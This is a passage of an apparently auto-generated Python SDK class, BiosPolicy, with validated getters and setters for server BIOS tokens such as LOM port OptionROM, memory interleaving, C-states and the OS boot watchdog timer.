:return: The legacy_usb_support of this BiosPolicy.
:rtype: str
"""
return self._legacy_usb_support
@legacy_usb_support.setter
def legacy_usb_support(self, legacy_usb_support):
"""
Sets the legacy_usb_support of this BiosPolicy.
BIOS Token for setting Legacy USB Support configuration
:param legacy_usb_support: The legacy_usb_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "auto", "disabled", "enabled"]
if legacy_usb_support not in allowed_values:
raise ValueError(
"Invalid value for `legacy_usb_support` ({0}), must be one of {1}"
.format(legacy_usb_support, allowed_values)
)
self._legacy_usb_support = legacy_usb_support
@property
def llc_prefetch(self):
"""
Gets the llc_prefetch of this BiosPolicy.
BIOS Token for setting LLC Prefetch configuration
:return: The llc_prefetch of this BiosPolicy.
:rtype: str
"""
return self._llc_prefetch
@llc_prefetch.setter
def llc_prefetch(self, llc_prefetch):
"""
Sets the llc_prefetch of this BiosPolicy.
BIOS Token for setting LLC Prefetch configuration
:param llc_prefetch: The llc_prefetch of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if llc_prefetch not in allowed_values:
raise ValueError(
"Invalid value for `llc_prefetch` ({0}), must be one of {1}"
.format(llc_prefetch, allowed_values)
)
self._llc_prefetch = llc_prefetch
@property
def lom_port0state(self):
"""
Gets the lom_port0state of this BiosPolicy.
BIOS Token for setting LOM Port 0 OptionROM configuration
:return: The lom_port0state of this BiosPolicy.
:rtype: str
"""
return self._lom_port0state
@lom_port0state.setter
def lom_port0state(self, lom_port0state):
"""
Sets the lom_port0state of this BiosPolicy.
BIOS Token for setting LOM Port 0 OptionROM configuration
:param lom_port0state: The lom_port0state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if lom_port0state not in allowed_values:
raise ValueError(
"Invalid value for `lom_port0state` ({0}), must be one of {1}"
.format(lom_port0state, allowed_values)
)
self._lom_port0state = lom_port0state
@property
def lom_port1state(self):
"""
Gets the lom_port1state of this BiosPolicy.
BIOS Token for setting LOM Port 1 OptionRom configuration
:return: The lom_port1state of this BiosPolicy.
:rtype: str
"""
return self._lom_port1state
@lom_port1state.setter
def lom_port1state(self, lom_port1state):
"""
Sets the lom_port1state of this BiosPolicy.
BIOS Token for setting LOM Port 1 OptionRom configuration
:param lom_port1state: The lom_port1state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if lom_port1state not in allowed_values:
raise ValueError(
"Invalid value for `lom_port1state` ({0}), must be one of {1}"
.format(lom_port1state, allowed_values)
)
self._lom_port1state = lom_port1state
@property
def lom_port2state(self):
"""
Gets the lom_port2state of this BiosPolicy.
BIOS Token for setting LOM Port 2 OptionRom configuration
:return: The lom_port2state of this BiosPolicy.
:rtype: str
"""
return self._lom_port2state
@lom_port2state.setter
def lom_port2state(self, lom_port2state):
"""
Sets the lom_port2state of this BiosPolicy.
BIOS Token for setting LOM Port 2 OptionRom configuration
:param lom_port2state: The lom_port2state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if lom_port2state not in allowed_values:
raise ValueError(
"Invalid value for `lom_port2state` ({0}), must be one of {1}"
.format(lom_port2state, allowed_values)
)
self._lom_port2state = lom_port2state
@property
def lom_port3state(self):
"""
Gets the lom_port3state of this BiosPolicy.
BIOS Token for setting LOM Port 3 OptionRom configuration
:return: The lom_port3state of this BiosPolicy.
:rtype: str
"""
return self._lom_port3state
@lom_port3state.setter
def lom_port3state(self, lom_port3state):
"""
Sets the lom_port3state of this BiosPolicy.
BIOS Token for setting LOM Port 3 OptionRom configuration
:param lom_port3state: The lom_port3state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if lom_port3state not in allowed_values:
raise ValueError(
"Invalid value for `lom_port3state` ({0}), must be one of {1}"
.format(lom_port3state, allowed_values)
)
self._lom_port3state = lom_port3state
@property
def lom_ports_all_state(self):
"""
Gets the lom_ports_all_state of this BiosPolicy.
BIOS Token for setting All Onboard LOM Ports configuration
:return: The lom_ports_all_state of this BiosPolicy.
:rtype: str
"""
return self._lom_ports_all_state
@lom_ports_all_state.setter
def lom_ports_all_state(self, lom_ports_all_state):
"""
Sets the lom_ports_all_state of this BiosPolicy.
BIOS Token for setting All Onboard LOM Ports configuration
:param lom_ports_all_state: The lom_ports_all_state of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if lom_ports_all_state not in allowed_values:
raise ValueError(
"Invalid value for `lom_ports_all_state` ({0}), must be one of {1}"
.format(lom_ports_all_state, allowed_values)
)
self._lom_ports_all_state = lom_ports_all_state
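    # Illustrative sketch: the LOM OptionROM tokens mix value casings
    # ("enabled"/"disabled" vs "Legacy Only"/"UEFI Only"), so assignments must
    # match allowed_values exactly. E.g. to expose only LOM port 0 to UEFI
    # boot:
    #
    #     policy.lom_ports_all_state = "enabled"
    #     policy.lom_port0state = "UEFI Only"
    #     for port in ("lom_port1state", "lom_port2state", "lom_port3state"):
    #         setattr(policy, port, "disabled")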
@property
def lv_ddr_mode(self):
"""
Gets the lv_ddr_mode of this BiosPolicy.
BIOS Token for setting Low Voltage DDR Mode configuration
:return: The lv_ddr_mode of this BiosPolicy.
:rtype: str
"""
return self._lv_ddr_mode
@lv_ddr_mode.setter
def lv_ddr_mode(self, lv_ddr_mode):
"""
Sets the lv_ddr_mode of this BiosPolicy.
BIOS Token for setting Low Voltage DDR Mode configuration
:param lv_ddr_mode: The lv_ddr_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "auto", "performance-mode", "power-saving-mode"]
if lv_ddr_mode not in allowed_values:
raise ValueError(
"Invalid value for `lv_ddr_mode` ({0}), must be one of {1}"
.format(lv_ddr_mode, allowed_values)
)
self._lv_ddr_mode = lv_ddr_mode
@property
def make_device_non_bootable(self):
"""
Gets the make_device_non_bootable of this BiosPolicy.
BIOS Token for setting Make Device Non Bootable configuration
:return: The make_device_non_bootable of this BiosPolicy.
:rtype: str
"""
return self._make_device_non_bootable
@make_device_non_bootable.setter
def make_device_non_bootable(self, make_device_non_bootable):
"""
Sets the make_device_non_bootable of this BiosPolicy.
BIOS Token for setting Make Device Non Bootable configuration
:param make_device_non_bootable: The make_device_non_bootable of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if make_device_non_bootable not in allowed_values:
raise ValueError(
"Invalid value for `make_device_non_bootable` ({0}), must be one of {1}"
.format(make_device_non_bootable, allowed_values)
)
self._make_device_non_bootable = make_device_non_bootable
@property
def memory_inter_leave(self):
"""
Gets the memory_inter_leave of this BiosPolicy.
BIOS Token for setting Memory Interleaving configuration
:return: The memory_inter_leave of this BiosPolicy.
:rtype: str
"""
return self._memory_inter_leave
@memory_inter_leave.setter
def memory_inter_leave(self, memory_inter_leave):
"""
Sets the memory_inter_leave of this BiosPolicy.
BIOS Token for setting Memory Interleaving configuration
:param memory_inter_leave: The memory_inter_leave of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1 Way Node Interleave", "2 Way Node Interleave", "4 Way Node Interleave", "8 Way Node Interleave", "disabled", "enabled"]
if memory_inter_leave not in allowed_values:
raise ValueError(
"Invalid value for `memory_inter_leave` ({0}), must be one of {1}"
.format(memory_inter_leave, allowed_values)
)
self._memory_inter_leave = memory_inter_leave
@property
def memory_mapped_io_above4gb(self):
"""
Gets the memory_mapped_io_above4gb of this BiosPolicy.
BIOS Token for setting Memory mapped IO above 4GB configuration
:return: The memory_mapped_io_above4gb of this BiosPolicy.
:rtype: str
"""
return self._memory_mapped_io_above4gb
@memory_mapped_io_above4gb.setter
def memory_mapped_io_above4gb(self, memory_mapped_io_above4gb):
"""
Sets the memory_mapped_io_above4gb of this BiosPolicy.
BIOS Token for setting Memory mapped IO above 4GB configuration
:param memory_mapped_io_above4gb: The memory_mapped_io_above4gb of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if memory_mapped_io_above4gb not in allowed_values:
raise ValueError(
"Invalid value for `memory_mapped_io_above4gb` ({0}), must be one of {1}"
.format(memory_mapped_io_above4gb, allowed_values)
)
self._memory_mapped_io_above4gb = memory_mapped_io_above4gb
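# Sketch (illustrative): devices with large PCIe BARs, such as GPUs and
# some NVMe adapters, generally require 64-bit MMIO decode:
#
#     policy.memory_mapped_io_above4gb = "enabled"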
@property
def mirroring_mode(self):
"""
Gets the mirroring_mode of this BiosPolicy.
BIOS Token for setting Mirroring Mode configuration
:return: The mirroring_mode of this BiosPolicy.
:rtype: str
"""
return self._mirroring_mode
@mirroring_mode.setter
def mirroring_mode(self, mirroring_mode):
"""
Sets the mirroring_mode of this BiosPolicy.
BIOS Token for setting Mirroring Mode configuration
:param mirroring_mode: The mirroring_mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "inter-socket", "intra-socket"]
if mirroring_mode not in allowed_values:
raise ValueError(
"Invalid value for `mirroring_mode` ({0}), must be one of {1}"
.format(mirroring_mode, allowed_values)
)
self._mirroring_mode = mirroring_mode
@property
def mmcfg_base(self):
"""
Gets the mmcfg_base of this BiosPolicy.
BIOS Token for setting MMCFG BASE configuration
:return: The mmcfg_base of this BiosPolicy.
:rtype: str
"""
return self._mmcfg_base
@mmcfg_base.setter
def mmcfg_base(self, mmcfg_base):
"""
Sets the mmcfg_base of this BiosPolicy.
BIOS Token for setting MMCFG BASE configuration
:param mmcfg_base: The mmcfg_base of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "1 GB", "2 GB", "2.5 GB", "3 GB", "Auto"]
if mmcfg_base not in allowed_values:
raise ValueError(
"Invalid value for `mmcfg_base` ({0}), must be one of {1}"
.format(mmcfg_base, allowed_values)
)
self._mmcfg_base = mmcfg_base
@property
def numa_optimized(self):
"""
Gets the numa_optimized of this BiosPolicy.
BIOS Token for setting NUMA optimized configuration
:return: The numa_optimized of this BiosPolicy.
:rtype: str
"""
return self._numa_optimized
@numa_optimized.setter
def numa_optimized(self, numa_optimized):
"""
Sets the numa_optimized of this BiosPolicy.
BIOS Token for setting NUMA optimized configuration
:param numa_optimized: The numa_optimized of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if numa_optimized not in allowed_values:
raise ValueError(
"Invalid value for `numa_optimized` ({0}), must be one of {1}"
.format(numa_optimized, allowed_values)
)
self._numa_optimized = numa_optimized
@property
def onboard10gbit_lom(self):
"""
Gets the onboard10gbit_lom of this BiosPolicy.
BIOS Token for setting Onboard 10Gbit LOM configuration
:return: The onboard10gbit_lom of this BiosPolicy.
:rtype: str
"""
return self._onboard10gbit_lom
@onboard10gbit_lom.setter
def onboard10gbit_lom(self, onboard10gbit_lom):
"""
Sets the onboard10gbit_lom of this BiosPolicy.
BIOS Token for setting Onboard 10Gbit LOM configuration
:param onboard10gbit_lom: The onboard10gbit_lom of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if onboard10gbit_lom not in allowed_values:
raise ValueError(
"Invalid value for `onboard10gbit_lom` ({0}), must be one of {1}"
.format(onboard10gbit_lom, allowed_values)
)
self._onboard10gbit_lom = onboard10gbit_lom
@property
def onboard_gbit_lom(self):
"""
Gets the onboard_gbit_lom of this BiosPolicy.
BIOS Token for setting Onboard Gbit LOM configuration
:return: The onboard_gbit_lom of this BiosPolicy.
:rtype: str
"""
return self._onboard_gbit_lom
@onboard_gbit_lom.setter
def onboard_gbit_lom(self, onboard_gbit_lom):
"""
Sets the onboard_gbit_lom of this BiosPolicy.
BIOS Token for setting Onboard Gbit LOM configuration
:param onboard_gbit_lom: The onboard_gbit_lom of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if onboard_gbit_lom not in allowed_values:
raise ValueError(
"Invalid value for `onboard_gbit_lom` ({0}), must be one of {1}"
.format(onboard_gbit_lom, allowed_values)
)
self._onboard_gbit_lom = onboard_gbit_lom
@property
def onboard_scu_storage_support(self):
"""
Gets the onboard_scu_storage_support of this BiosPolicy.
BIOS Token for setting Onboard SCU Storage Support configuration
:return: The onboard_scu_storage_support of this BiosPolicy.
:rtype: str
"""
return self._onboard_scu_storage_support
@onboard_scu_storage_support.setter
def onboard_scu_storage_support(self, onboard_scu_storage_support):
"""
Sets the onboard_scu_storage_support of this BiosPolicy.
BIOS Token for setting Onboard SCU Storage Support configuration
:param onboard_scu_storage_support: The onboard_scu_storage_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if onboard_scu_storage_support not in allowed_values:
raise ValueError(
"Invalid value for `onboard_scu_storage_support` ({0}), must be one of {1}"
.format(onboard_scu_storage_support, allowed_values)
)
self._onboard_scu_storage_support = onboard_scu_storage_support
@property
def onboard_scu_storage_sw_stack(self):
"""
Gets the onboard_scu_storage_sw_stack of this BiosPolicy.
BIOS Token for setting Onboard SCU Storage SW Stack configuration
:return: The onboard_scu_storage_sw_stack of this BiosPolicy.
:rtype: str
"""
return self._onboard_scu_storage_sw_stack
@onboard_scu_storage_sw_stack.setter
def onboard_scu_storage_sw_stack(self, onboard_scu_storage_sw_stack):
"""
Sets the onboard_scu_storage_sw_stack of this BiosPolicy.
BIOS Token for setting Onboard SCU Storage SW Stack configuration
:param onboard_scu_storage_sw_stack: The onboard_scu_storage_sw_stack of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Intel RSTe", "LSI SW RAID"]
if onboard_scu_storage_sw_stack not in allowed_values:
raise ValueError(
"Invalid value for `onboard_scu_storage_sw_stack` ({0}), must be one of {1}"
.format(onboard_scu_storage_sw_stack, allowed_values)
)
self._onboard_scu_storage_sw_stack = onboard_scu_storage_sw_stack
@property
def organization(self):
"""
Gets the organization of this BiosPolicy.
Organization
:return: The organization of this BiosPolicy.
:rtype: IamAccountRef
"""
return self._organization
@organization.setter
def organization(self, organization):
"""
Sets the organization of this BiosPolicy.
Organization
:param organization: The organization of this BiosPolicy.
:type: IamAccountRef
"""
self._organization = organization
@property
def os_boot_watchdog_timer(self):
"""
Gets the os_boot_watchdog_timer of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer configuration
:return: The os_boot_watchdog_timer of this BiosPolicy.
:rtype: str
"""
return self._os_boot_watchdog_timer
@os_boot_watchdog_timer.setter
def os_boot_watchdog_timer(self, os_boot_watchdog_timer):
"""
Sets the os_boot_watchdog_timer of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer configuration
:param os_boot_watchdog_timer: The os_boot_watchdog_timer of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if os_boot_watchdog_timer not in allowed_values:
raise ValueError(
"Invalid value for `os_boot_watchdog_timer` ({0}), must be one of {1}"
.format(os_boot_watchdog_timer, allowed_values)
)
self._os_boot_watchdog_timer = os_boot_watchdog_timer
@property
def os_boot_watchdog_timer_policy(self):
"""
Gets the os_boot_watchdog_timer_policy of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer Policy configuration
:return: The os_boot_watchdog_timer_policy of this BiosPolicy.
:rtype: str
"""
return self._os_boot_watchdog_timer_policy
@os_boot_watchdog_timer_policy.setter
def os_boot_watchdog_timer_policy(self, os_boot_watchdog_timer_policy):
"""
Sets the os_boot_watchdog_timer_policy of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer Policy configuration
:param os_boot_watchdog_timer_policy: The os_boot_watchdog_timer_policy of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "do-nothing", "power-off", "reset"]
if os_boot_watchdog_timer_policy not in allowed_values:
raise ValueError(
"Invalid value for `os_boot_watchdog_timer_policy` ({0}), must be one of {1}"
.format(os_boot_watchdog_timer_policy, allowed_values)
)
self._os_boot_watchdog_timer_policy = os_boot_watchdog_timer_policy
@property
def os_boot_watchdog_timer_timeout(self):
"""
Gets the os_boot_watchdog_timer_timeout of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer Timeout configuration
:return: The os_boot_watchdog_timer_timeout of this BiosPolicy.
:rtype: str
"""
return self._os_boot_watchdog_timer_timeout
@os_boot_watchdog_timer_timeout.setter
def os_boot_watchdog_timer_timeout(self, os_boot_watchdog_timer_timeout):
"""
Sets the os_boot_watchdog_timer_timeout of this BiosPolicy.
BIOS Token for setting OS Boot Watchdog Timer Timeout configuration
:param os_boot_watchdog_timer_timeout: The os_boot_watchdog_timer_timeout of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "10-minutes", "15-minutes", "20-minutes", "5-minutes"]
if os_boot_watchdog_timer_timeout not in allowed_values:
raise ValueError(
"Invalid value for `os_boot_watchdog_timer_timeout` ({0}), must be one of {1}"
.format(os_boot_watchdog_timer_timeout, allowed_values)
)
self._os_boot_watchdog_timer_timeout = os_boot_watchdog_timer_timeout
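# Sketch (illustrative) of the three related watchdog tokens set
# together; the policy and timeout are only meaningful when the timer
# itself is enabled. Values come from the allowed_values lists above:
#
#     policy.os_boot_watchdog_timer = "enabled"
#     policy.os_boot_watchdog_timer_policy = "reset"        # action on expiry
#     policy.os_boot_watchdog_timer_timeout = "10-minutes"  # expiry window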
@property
def out_of_band_mgmt_port(self):
"""
Gets the out_of_band_mgmt_port of this BiosPolicy.
BIOS Token for setting Out-of-Band Mgmt Port configuration
:return: The out_of_band_mgmt_port of this BiosPolicy.
:rtype: str
"""
return self._out_of_band_mgmt_port
@out_of_band_mgmt_port.setter
def out_of_band_mgmt_port(self, out_of_band_mgmt_port):
"""
Sets the out_of_band_mgmt_port of this BiosPolicy.
BIOS Token for setting Out-of-Band Mgmt Port configuration
:param out_of_band_mgmt_port: The out_of_band_mgmt_port of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if out_of_band_mgmt_port not in allowed_values:
raise ValueError(
"Invalid value for `out_of_band_mgmt_port` ({0}), must be one of {1}"
.format(out_of_band_mgmt_port, allowed_values)
)
self._out_of_band_mgmt_port = out_of_band_mgmt_port
@property
def package_cstate_limit(self):
"""
Gets the package_cstate_limit of this BiosPolicy.
BIOS Token for setting Package C State Limit configuration
:return: The package_cstate_limit of this BiosPolicy.
:rtype: str
"""
return self._package_cstate_limit
@package_cstate_limit.setter
def package_cstate_limit(self, package_cstate_limit):
"""
Sets the package_cstate_limit of this BiosPolicy.
BIOS Token for setting Package C State Limit configuration
:param package_cstate_limit: The package_cstate_limit of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "Auto", "C0 C1 State", "C0/C1", "C2", "C6 Non Retention", "C6 Retention", "No Limit"]
if package_cstate_limit not in allowed_values:
raise ValueError(
"Invalid value for `package_cstate_limit` ({0}), must be one of {1}"
.format(package_cstate_limit, allowed_values)
)
self._package_cstate_limit = package_cstate_limit
@property
def patrol_scrub(self):
"""
Gets the patrol_scrub of this BiosPolicy.
BIOS Token for setting Patrol Scrub configuration
:return: The patrol_scrub of this BiosPolicy.
:rtype: str
"""
return self._patrol_scrub
@patrol_scrub.setter
def patrol_scrub(self, patrol_scrub):
"""
Sets the patrol_scrub of this BiosPolicy.
BIOS Token for setting Patrol Scrub configuration
:param patrol_scrub: The patrol_scrub of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if patrol_scrub not in allowed_values:
raise ValueError(
"Invalid value for `patrol_scrub` ({0}), must be one of {1}"
.format(patrol_scrub, allowed_values)
)
self._patrol_scrub = patrol_scrub
@property
def patrol_scrub_duration(self):
"""
Gets the patrol_scrub_duration of this BiosPolicy.
BIOS Token for setting Patrol Scrub Interval configuration
:return: The patrol_scrub_duration of this BiosPolicy.
:rtype: str
"""
return self._patrol_scrub_duration
@patrol_scrub_duration.setter
def patrol_scrub_duration(self, patrol_scrub_duration):
"""
Sets the patrol_scrub_duration of this BiosPolicy.
BIOS Token for setting Patrol Scrub Interval configuration
:param patrol_scrub_duration: The patrol_scrub_duration of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if patrol_scrub_duration not in allowed_values:
raise ValueError(
"Invalid value for `patrol_scrub_duration` ({0}), must be one of {1}"
.format(patrol_scrub_duration, allowed_values)
)
self._patrol_scrub_duration = patrol_scrub_duration
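# Note: `patrol_scrub` enables background memory scrubbing. Despite its
# "Interval" description, `patrol_scrub_duration` as generated here only
# accepts enabled/disabled rather than a time value.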
@property
def pc_ie_ssd_hot_plug_support(self):
"""
Gets the pc_ie_ssd_hot_plug_support of this BiosPolicy.
BIOS Token for setting NVMe SSD Hot-Plug Support configuration
:return: The pc_ie_ssd_hot_plug_support of this BiosPolicy.
:rtype: str
"""
return self._pc_ie_ssd_hot_plug_support
@pc_ie_ssd_hot_plug_support.setter
def pc_ie_ssd_hot_plug_support(self, pc_ie_ssd_hot_plug_support):
"""
Sets the pc_ie_ssd_hot_plug_support of this BiosPolicy.
BIOS Token for setting NVMe SSD Hot-Plug Support configuration
:param pc_ie_ssd_hot_plug_support: The pc_ie_ssd_hot_plug_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if pc_ie_ssd_hot_plug_support not in allowed_values:
raise ValueError(
"Invalid value for `pc_ie_ssd_hot_plug_support` ({0}), must be one of {1}"
.format(pc_ie_ssd_hot_plug_support, allowed_values)
)
self._pc_ie_ssd_hot_plug_support = pc_ie_ssd_hot_plug_support
@property
def pch_usb30mode(self):
"""
Gets the pch_usb30mode of this BiosPolicy.
BIOS Token for setting xHCI Mode configuration
:return: The pch_usb30mode of this BiosPolicy.
:rtype: str
"""
return self._pch_usb30mode
@pch_usb30mode.setter
def pch_usb30mode(self, pch_usb30mode):
"""
Sets the pch_usb30mode of this BiosPolicy.
BIOS Token for setting xHCI Mode configuration
:param pch_usb30mode: The pch_usb30mode of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if pch_usb30mode not in allowed_values:
raise ValueError(
"Invalid value for `pch_usb30mode` ({0}), must be one of {1}"
.format(pch_usb30mode, allowed_values)
)
self._pch_usb30mode = pch_usb30mode
@property
def pci_option_ro_ms(self):
"""
Gets the pci_option_ro_ms of this BiosPolicy.
BIOS Token for setting All PCIe Slots OptionROM configuration
:return: The pci_option_ro_ms of this BiosPolicy.
:rtype: str
"""
return self._pci_option_ro_ms
@pci_option_ro_ms.setter
def pci_option_ro_ms(self, pci_option_ro_ms):
"""
Sets the pci_option_ro_ms of this BiosPolicy.
BIOS Token for setting All PCIe Slots OptionROM configuration
:param pci_option_ro_ms: The pci_option_ro_ms of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"]
if pci_option_ro_ms not in allowed_values:
raise ValueError(
"Invalid value for `pci_option_ro_ms` ({0}), must be one of {1}"
.format(pci_option_ro_ms, allowed_values)
)
self._pci_option_ro_ms = pci_option_ro_ms
@property
def pci_rom_clp(self):
"""
Gets the pci_rom_clp of this BiosPolicy.
BIOS Token for setting PCI ROM CLP configuration
:return: The pci_rom_clp of this BiosPolicy.
:rtype: str
"""
return self._pci_rom_clp
@pci_rom_clp.setter
def pci_rom_clp(self, pci_rom_clp):
"""
Sets the pci_rom_clp of this BiosPolicy.
BIOS Token for setting PCI ROM CLP configuration
:param pci_rom_clp: The pci_rom_clp of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if pci_rom_clp not in allowed_values:
raise ValueError(
"Invalid value for `pci_rom_clp` ({0}), must be one of {1}"
.format(pci_rom_clp, allowed_values)
)
self._pci_rom_clp = pci_rom_clp
@property
def pop_support(self):
"""
Gets the pop_support of this BiosPolicy.
BIOS Token for setting Power ON Password configuration
:return: The pop_support of this BiosPolicy.
:rtype: str
"""
return self._pop_support
@pop_support.setter
def pop_support(self, pop_support):
"""
Sets the pop_support of this BiosPolicy.
BIOS Token for setting Power ON Password configuration
:param pop_support: The pop_support of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if pop_support not in allowed_values:
raise ValueError(
"Invalid value for `pop_support` ({0}), must be one of {1}"
.format(pop_support, allowed_values)
)
self._pop_support = pop_support
@property
def post_error_pause(self):
"""
Gets the post_error_pause of this BiosPolicy.
BIOS Token for setting POST Error Pause configuration
:return: The post_error_pause of this BiosPolicy.
:rtype: str
"""
return self._post_error_pause
@post_error_pause.setter
def post_error_pause(self, post_error_pause):
"""
Sets the post_error_pause of this BiosPolicy.
BIOS Token for setting POST Error Pause configuration
:param post_error_pause: The post_error_pause of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if post_error_pause not in allowed_values:
raise ValueError(
"Invalid value for `post_error_pause` ({0}), must be one of {1}"
.format(post_error_pause, allowed_values)
)
self._post_error_pause = post_error_pause
@property
def processor_c1e(self):
"""
Gets the processor_c1e of this BiosPolicy.
BIOS Token for setting Processor C1E configuration
:return: The processor_c1e of this BiosPolicy.
:rtype: str
"""
return self._processor_c1e
@processor_c1e.setter
def processor_c1e(self, processor_c1e):
"""
Sets the processor_c1e of this BiosPolicy.
BIOS Token for setting Processor C1E configuration
:param processor_c1e: The processor_c1e of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if processor_c1e not in allowed_values:
raise ValueError(
"Invalid value for `processor_c1e` ({0}), must be one of {1}"
.format(processor_c1e, allowed_values)
)
self._processor_c1e = processor_c1e
@property
def processor_c3report(self):
"""
Gets the processor_c3report of this BiosPolicy.
BIOS Token for setting Processor C3 Report configuration
:return: The processor_c3report of this BiosPolicy.
:rtype: str
"""
return self._processor_c3report
@processor_c3report.setter
def processor_c3report(self, processor_c3report):
"""
Sets the processor_c3report of this BiosPolicy.
BIOS Token for setting Processor C3 Report configuration
:param processor_c3report: The processor_c3report of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if processor_c3report not in allowed_values:
raise ValueError(
"Invalid value for `processor_c3report` ({0}), must be one of {1}"
.format(processor_c3report, allowed_values)
)
self._processor_c3report = processor_c3report
@property
def processor_c6report(self):
"""
Gets the processor_c6report of this BiosPolicy.
BIOS Token for setting Processor C6 Report configuration
:return: The processor_c6report of this BiosPolicy.
:rtype: str
"""
return self._processor_c6report
@processor_c6report.setter
def processor_c6report(self, processor_c6report):
"""
Sets the processor_c6report of this BiosPolicy.
BIOS Token for setting Processor C6 Report configuration
:param processor_c6report: The processor_c6report of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if processor_c6report not in allowed_values:
raise ValueError(
"Invalid value for `processor_c6report` ({0}), must be one of {1}"
.format(processor_c6report, allowed_values)
)
self._processor_c6report = processor_c6report
@property
def processor_cstate(self):
"""
Gets the processor_cstate of this BiosPolicy.
BIOS Token for setting CPU C State configuration
:return: The processor_cstate of this BiosPolicy.
:rtype: str
"""
return self._processor_cstate
@processor_cstate.setter
def processor_cstate(self, processor_cstate):
"""
Sets the processor_cstate of this BiosPolicy.
BIOS Token for setting CPU C State configuration
:param processor_cstate: The processor_cstate of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "enabled", "disabled"]
if processor_cstate not in allowed_values:
raise ValueError(
"Invalid value for `processor_cstate` ({0}), must be one of {1}"
.format(processor_cstate, allowed_values)
)
self._processor_cstate = processor_cstate
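# Sketch (illustrative) of how the C-state tokens relate:
# `processor_cstate` gates C-states overall, the c1e/c3report/c6report
# tokens control individual states, and `package_cstate_limit` caps how
# deep the package may idle. A common low-latency tuning:
#
#     policy.processor_cstate = "disabled"
#     policy.processor_c1e = "disabled"
#     policy.package_cstate_limit = "C0/C1"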
@property
def profiles(self):
"""
Gets the profiles of this BiosPolicy.
Relationship to the profile objects
:return: The profiles of this BiosPolicy.
:rtype: list[PolicyAbstractConfigProfileRef]
"""
return self._profiles
@profiles.setter
def profiles(self, profiles):
"""
Sets the profiles of this BiosPolicy.
Relationship to the profile objects
:param profiles: The profiles of this BiosPolicy.
:type: list[PolicyAbstractConfigProfileRef]
"""
self._profiles = profiles
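# Note: relationship properties such as `organization` and `profiles`
# are plain object references and are assigned without validation; only
# the string-valued BIOS tokens are checked against an allowed_values
# list.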
@property
def psata(self):
"""
Gets the psata of this BiosPolicy.
BIOS Token for setting P-SATA mode configuration
:return: The psata of this BiosPolicy.
:rtype: str
"""
return self._psata
@psata.setter
def psata(self, psata):
"""
Sets the psata of this BiosPolicy.
BIOS Token for setting P-SATA mode configuration
:param psata: The psata of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "AHCI", "Disabled", "LSI SW RAID"]
if psata not in allowed_values:
raise ValueError(
"Invalid value for `psata` ({0}), must be one of {1}"
.format(psata, allowed_values)
)
self._psata = psata
@property
def pstate_coord_type(self):
"""
Gets the pstate_coord_type of this BiosPolicy.
BIOS Token for setting P-STATE Coordination configuration
:return: The pstate_coord_type of this BiosPolicy.
:rtype: str
"""
return self._pstate_coord_type
@pstate_coord_type.setter
def pstate_coord_type(self, pstate_coord_type):
"""
Sets the pstate_coord_type of this BiosPolicy.
BIOS Token for setting P-STATE Coordination configuration
:param pstate_coord_type: The pstate_coord_type of this BiosPolicy.
:type: str
"""
allowed_values = ["platform-default", "HW ALL", "SW ALL", "SW ANY"]
if pstate_coord_type not in allowed_values:
raise ValueError(
"Invalid value for `pstate_coord_type` ({0}), must be one of {1}"
.format(pstate_coord_type, allowed_values)
)
self._pstate_coord_type = pstate_coord_type
@property
def putty_key_pad(self):
"""
Gets the putty_key_pad of this BiosPolicy.
BIOS Token for setting Putty KeyPad configuration
:return: The putty_key_pad of this BiosPolicy.
:rtype: str
"""
return self._putty_key_pad
@putty_key_pad.setter
